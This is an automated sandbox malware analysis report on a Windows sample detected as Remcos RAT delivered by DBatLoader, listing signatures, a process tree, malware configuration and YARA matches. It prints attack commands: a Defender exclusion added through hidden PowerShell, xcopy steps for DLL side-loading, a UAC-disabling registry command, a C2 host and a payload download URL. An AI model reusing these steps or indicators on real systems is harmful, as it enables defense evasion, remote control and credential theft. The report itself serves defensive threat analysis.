Edit tour

Windows Analysis Report
tTIYCp2sf4.exe

Overview

General Information

Sample Name:	tTIYCp2sf4.exe
Original Sample Name:	cf39a14a2dc1fe5aa487b6faf19c63bc97103db670fa24c62832895e3002eca2.exe
Analysis ID:	1285850
MD5:	ae5ad2efd8a9cf25ad9eb00ebe24eb92
SHA1:	2eee8f21d06a2602ed0cd3e5dc3a8a0dea8157d1
SHA256:	cf39a14a2dc1fe5aa487b6faf19c63bc97103db670fa24c62832895e3002eca2
Tags:	exeModiLoader
Infos:

Detection

Remcos, DBatLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (overwrites its own PE header)

Sigma detected: Remcos

Detected unpacking (changes PE section rights)

Antivirus detection for dropped file

Snort IDS alert for network traffic

Found malware configuration

Yara detected UAC Bypass using CMSTP

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Remcos RAT

Yara detected DBatLoader

Multi AV Scanner detection for dropped file

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Machine Learning detection for sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

DLL side loading technique detected

Adds a directory exclusion to Windows Defender

Drops executables to the windows directory (C:\Windows) and starts them

Sample uses process hollowing technique

Installs a global keyboard hook

Drops PE files with a suspicious file extension

Writes to foreign memory regions

Suspicious powershell command line found

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Drops PE files to the windows directory (C:\Windows)

Binary contains a suspicious time stamp

PE file contains more sections than normal

Yara detected Keylogger Generic

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Deletes files inside the Windows folder

Creates files inside the system directory

PE file contains sections with non-standard names

Found potential string decryption / allocating functions

Contains functionality to call native functions

IP address seen in connection with other malware

Entry point lies outside standard sections

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

Detected TCP or UDP traffic on non-standard ports

Classification

Process Tree

System is w10x64

tTIYCp2sf4.exe (PID: 7068 cmdline: C:\Users\user\Desktop\tTIYCp2sf4.exe MD5: AE5AD2EFD8A9CF25AD9EB00EBE24EB92)

cmd.exe (PID: 6332 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\GjwyghlfO.bat" " MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6304 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO F" MD5: F3BDBE3BB6F734E357235F4D5898582D)

xcopy.exe (PID: 3616 cmdline: xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y MD5: 9F3712DDC0D7FE3D75B8A06C6EE8E68C)

cmd.exe (PID: 3112 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO F" MD5: F3BDBE3BB6F734E357235F4D5898582D)

xcopy.exe (PID: 6468 cmdline: xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y MD5: 9F3712DDC0D7FE3D75B8A06C6EE8E68C)

cmd.exe (PID: 6620 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO F" MD5: F3BDBE3BB6F734E357235F4D5898582D)

xcopy.exe (PID: 6616 cmdline: xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y MD5: 9F3712DDC0D7FE3D75B8A06C6EE8E68C)

easinvoker.exe (PID: 6552 cmdline: C:\Windows \System32\easinvoker.exe MD5: 231CE1E1D7D98B44371FFFF407D68B59)

cmd.exe (PID: 6576 cmdline: C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat"" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 2404 cmdline: powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 2164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 1332 cmdline: ping 127.0.0.1 -n 6 MD5: 70C24A306F768936563ABDADB9CA9108)

flhgywjG.bat (PID: 4028 cmdline: C:\Users\Public\Libraries\flhgywjG.bat MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Gjwyghlf.PIF (PID: 6936 cmdline: "C:\Users\Public\Libraries\Gjwyghlf.PIF" MD5: AE5AD2EFD8A9CF25AD9EB00EBE24EB92)

flhgywjG.bat (PID: 6572 cmdline: C:\Users\Public\Libraries\flhgywjG.bat MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Gjwyghlf.PIF (PID: 4396 cmdline: "C:\Users\Public\Libraries\Gjwyghlf.PIF" MD5: AE5AD2EFD8A9CF25AD9EB00EBE24EB92)

flhgywjG.bat (PID: 6888 cmdline: C:\Users\Public\Libraries\flhgywjG.bat MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group	http://malware-traffic-analysis.net/2017/12/22/index.html https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://malcat.fr/blog/exploit-steganography-and-delphi-unpacking-dbatloader/ https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "www.binccoco.com:2404:0", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Mutex": "Rmc-5D7S76", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "gfdghfhjf"}

Threatname: DBatLoader

{"Download Url": "https://onedrive.live.com/download?resid=F253EE082321791B%21110&authkey=!AMAFiW2uLt6IzGM"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
tTIYCp2sf4.exe	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\Libraries\Gjwyghlf.PIF	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000016.00000002.586128217.0000000000647000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000014.00000002.571086194.0000000000557000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b4a0:$a1: Remcos restarted by watchdog! 0x6ba1c:$a3: %02i:%02i:%02i:%03i
00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x653d8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6536c:$s1: CoGetObject 0x65380:$s1: CoGetObject 0x6539c:$s1: CoGetObject 0x6f27e:$s1: CoGetObject 0x6532c:$s2: Elevation:Administrator!new:
00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b490:$a1: Remcos restarted by watchdog! 0x6ba0c:$a3: %02i:%02i:%02i:%03i
00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x654e4:$str_a1: C:\Windows\System32\cmd.exe 0x65460:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65460:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65960:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66190:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65554:$str_b2: Executing file: 0x665d4:$str_b3: GetDirectListeningPort 0x65f80:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66100:$str_b7: \update.vbs 0x6557c:$str_b9: Downloaded file: 0x65568:$str_b10: Downloading file: 0x6560c:$str_b12: Failed to upload file: 0x6659c:$str_b13: StartForward 0x665bc:$str_b14: StopForward 0x66058:$str_b15: fso.DeleteFile " 0x65fec:$str_b16: On Error Resume Next 0x66088:$str_b17: fso.DeleteFolder " 0x655fc:$str_b18: Uploaded file: 0x655bc:$str_b19: Unable to delete: 0x66020:$str_b20: while fso.FileExists(" 0x65a99:$str_c0: [Firefox StoredLogins not found]
00000011.00000002.1053880782.00000000006CA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x653d8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6536c:$s1: CoGetObject 0x65380:$s1: CoGetObject 0x6539c:$s1: CoGetObject 0x6f27e:$s1: CoGetObject 0x6532c:$s2: Elevation:Administrator!new:
00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b490:$a1: Remcos restarted by watchdog! 0x6ba0c:$a3: %02i:%02i:%02i:%03i
00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x654e4:$str_a1: C:\Windows\System32\cmd.exe 0x65460:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65460:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65960:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66190:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65554:$str_b2: Executing file: 0x665d4:$str_b3: GetDirectListeningPort 0x65f80:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66100:$str_b7: \update.vbs 0x6557c:$str_b9: Downloaded file: 0x65568:$str_b10: Downloading file: 0x6560c:$str_b12: Failed to upload file: 0x6659c:$str_b13: StartForward 0x665bc:$str_b14: StopForward 0x66058:$str_b15: fso.DeleteFile " 0x65fec:$str_b16: On Error Resume Next 0x66088:$str_b17: fso.DeleteFolder " 0x655fc:$str_b18: Uploaded file: 0x655bc:$str_b19: Unable to delete: 0x66020:$str_b20: while fso.FileExists(" 0x65a99:$str_c0: [Firefox StoredLogins not found]
00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6a4a8:$a1: Remcos restarted by watchdog! 0x6aa24:$a3: %02i:%02i:%02i:%03i
00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x653d8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6536c:$s1: CoGetObject 0x65380:$s1: CoGetObject 0x6539c:$s1: CoGetObject 0x6f27e:$s1: CoGetObject 0x6532c:$s2: Elevation:Administrator!new:
00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b490:$a1: Remcos restarted by watchdog! 0x6ba0c:$a3: %02i:%02i:%02i:%03i
00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x654e4:$str_a1: C:\Windows\System32\cmd.exe 0x65460:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65460:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65960:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66190:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65554:$str_b2: Executing file: 0x665d4:$str_b3: GetDirectListeningPort 0x65f80:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66100:$str_b7: \update.vbs 0x6557c:$str_b9: Downloaded file: 0x65568:$str_b10: Downloading file: 0x6560c:$str_b12: Failed to upload file: 0x6659c:$str_b13: StartForward 0x665bc:$str_b14: StopForward 0x66058:$str_b15: fso.DeleteFile " 0x65fec:$str_b16: On Error Resume Next 0x66088:$str_b17: fso.DeleteFolder " 0x655fc:$str_b18: Uploaded file: 0x655bc:$str_b19: Unable to delete: 0x66020:$str_b20: while fso.FileExists(" 0x65a99:$str_c0: [Firefox StoredLogins not found]
Process Memory Space: tTIYCp2sf4.exe PID: 7068	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: tTIYCp2sf4.exe PID: 7068	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: tTIYCp2sf4.exe PID: 7068	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: tTIYCp2sf4.exe PID: 7068	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x253607:$a1: Remcos restarted by watchdog! 0x3cc47a:$a1: Remcos restarted by watchdog! 0x253b60:$a3: %02i:%02i:%02i:%03i 0x253f46:$a3: %02i:%02i:%02i:%03i 0x3cc9d3:$a3: %02i:%02i:%02i:%03i 0x3ccdb9:$a3: %02i:%02i:%02i:%03i
Process Memory Space: flhgywjG.bat PID: 4028	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: flhgywjG.bat PID: 4028	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: flhgywjG.bat PID: 4028	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x1d924:$a1: Remcos restarted by watchdog! 0x1de7d:$a3: %02i:%02i:%02i:%03i 0x1e263:$a3: %02i:%02i:%02i:%03i
Process Memory Space: flhgywjG.bat PID: 6572	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: flhgywjG.bat PID: 6572	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: flhgywjG.bat PID: 6572	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x10b4b:$a1: Remcos restarted by watchdog! 0x110a4:$a3: %02i:%02i:%02i:%03i 0x1148a:$a3: %02i:%02i:%02i:%03i
Process Memory Space: flhgywjG.bat PID: 6888	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: flhgywjG.bat PID: 6888	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: flhgywjG.bat PID: 6888	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x143dd:$a1: Remcos restarted by watchdog! 0x14936:$a3: %02i:%02i:%02i:%03i 0x14d1c:$a3: %02i:%02i:%02i:%03i
Click to see the 32 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
20.2.flhgywjG.bat.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.flhgywjG.bat.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
20.2.flhgywjG.bat.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x653d8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6536c:$s1: CoGetObject 0x65380:$s1: CoGetObject 0x6539c:$s1: CoGetObject 0x6f27e:$s1: CoGetObject 0x6532c:$s2: Elevation:Administrator!new:
20.2.flhgywjG.bat.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b490:$a1: Remcos restarted by watchdog! 0x6ba0c:$a3: %02i:%02i:%02i:%03i
20.2.flhgywjG.bat.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x654e4:$str_a1: C:\Windows\System32\cmd.exe 0x65460:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65460:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65960:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66190:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65554:$str_b2: Executing file: 0x665d4:$str_b3: GetDirectListeningPort 0x65f80:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66100:$str_b7: \update.vbs 0x6557c:$str_b9: Downloaded file: 0x65568:$str_b10: Downloading file: 0x6560c:$str_b12: Failed to upload file: 0x6659c:$str_b13: StartForward 0x665bc:$str_b14: StopForward 0x66058:$str_b15: fso.DeleteFile " 0x65fec:$str_b16: On Error Resume Next 0x66088:$str_b17: fso.DeleteFolder " 0x655fc:$str_b18: Uploaded file: 0x655bc:$str_b19: Unable to delete: 0x66020:$str_b20: while fso.FileExists(" 0x65a99:$str_c0: [Firefox StoredLogins not found]
22.2.flhgywjG.bat.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
22.2.flhgywjG.bat.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
22.2.flhgywjG.bat.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x643d8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6436c:$s1: CoGetObject 0x64380:$s1: CoGetObject 0x6439c:$s1: CoGetObject 0x6e27e:$s1: CoGetObject 0x6432c:$s2: Elevation:Administrator!new:
22.2.flhgywjG.bat.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6a490:$a1: Remcos restarted by watchdog! 0x6aa0c:$a3: %02i:%02i:%02i:%03i
22.2.flhgywjG.bat.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x644e4:$str_a1: C:\Windows\System32\cmd.exe 0x64460:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64460:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64960:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65190:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64554:$str_b2: Executing file: 0x655d4:$str_b3: GetDirectListeningPort 0x64f80:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65100:$str_b7: \update.vbs 0x6457c:$str_b9: Downloaded file: 0x64568:$str_b10: Downloading file: 0x6460c:$str_b12: Failed to upload file: 0x6559c:$str_b13: StartForward 0x655bc:$str_b14: StopForward 0x65058:$str_b15: fso.DeleteFile " 0x64fec:$str_b16: On Error Resume Next 0x65088:$str_b17: fso.DeleteFolder " 0x645fc:$str_b18: Uploaded file: 0x645bc:$str_b19: Unable to delete: 0x65020:$str_b20: while fso.FileExists(" 0x64a99:$str_c0: [Firefox StoredLogins not found]
22.2.flhgywjG.bat.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
22.2.flhgywjG.bat.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
22.2.flhgywjG.bat.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x653d8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6536c:$s1: CoGetObject 0x65380:$s1: CoGetObject 0x6539c:$s1: CoGetObject 0x6f27e:$s1: CoGetObject 0x6532c:$s2: Elevation:Administrator!new:
22.2.flhgywjG.bat.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b490:$a1: Remcos restarted by watchdog! 0x6ba0c:$a3: %02i:%02i:%02i:%03i
22.2.flhgywjG.bat.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x654e4:$str_a1: C:\Windows\System32\cmd.exe 0x65460:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65460:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65960:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66190:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65554:$str_b2: Executing file: 0x665d4:$str_b3: GetDirectListeningPort 0x65f80:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66100:$str_b7: \update.vbs 0x6557c:$str_b9: Downloaded file: 0x65568:$str_b10: Downloading file: 0x6560c:$str_b12: Failed to upload file: 0x6659c:$str_b13: StartForward 0x665bc:$str_b14: StopForward 0x66058:$str_b15: fso.DeleteFile " 0x65fec:$str_b16: On Error Resume Next 0x66088:$str_b17: fso.DeleteFolder " 0x655fc:$str_b18: Uploaded file: 0x655bc:$str_b19: Unable to delete: 0x66020:$str_b20: while fso.FileExists(" 0x65a99:$str_c0: [Firefox StoredLogins not found]
17.2.flhgywjG.bat.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
17.2.flhgywjG.bat.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.2.flhgywjG.bat.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x643d8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6436c:$s1: CoGetObject 0x64380:$s1: CoGetObject 0x6439c:$s1: CoGetObject 0x6e27e:$s1: CoGetObject 0x6432c:$s2: Elevation:Administrator!new:
17.2.flhgywjG.bat.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6a490:$a1: Remcos restarted by watchdog! 0x6aa0c:$a3: %02i:%02i:%02i:%03i
17.2.flhgywjG.bat.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x644e4:$str_a1: C:\Windows\System32\cmd.exe 0x64460:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64460:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64960:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65190:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64554:$str_b2: Executing file: 0x655d4:$str_b3: GetDirectListeningPort 0x64f80:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65100:$str_b7: \update.vbs 0x6457c:$str_b9: Downloaded file: 0x64568:$str_b10: Downloading file: 0x6460c:$str_b12: Failed to upload file: 0x6559c:$str_b13: StartForward 0x655bc:$str_b14: StopForward 0x65058:$str_b15: fso.DeleteFile " 0x64fec:$str_b16: On Error Resume Next 0x65088:$str_b17: fso.DeleteFolder " 0x645fc:$str_b18: Uploaded file: 0x645bc:$str_b19: Unable to delete: 0x65020:$str_b20: while fso.FileExists(" 0x64a99:$str_c0: [Firefox StoredLogins not found]
20.2.flhgywjG.bat.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.flhgywjG.bat.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
20.2.flhgywjG.bat.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x643d8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6436c:$s1: CoGetObject 0x64380:$s1: CoGetObject 0x6439c:$s1: CoGetObject 0x6e27e:$s1: CoGetObject 0x6432c:$s2: Elevation:Administrator!new:
20.2.flhgywjG.bat.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6a490:$a1: Remcos restarted by watchdog! 0x6aa0c:$a3: %02i:%02i:%02i:%03i
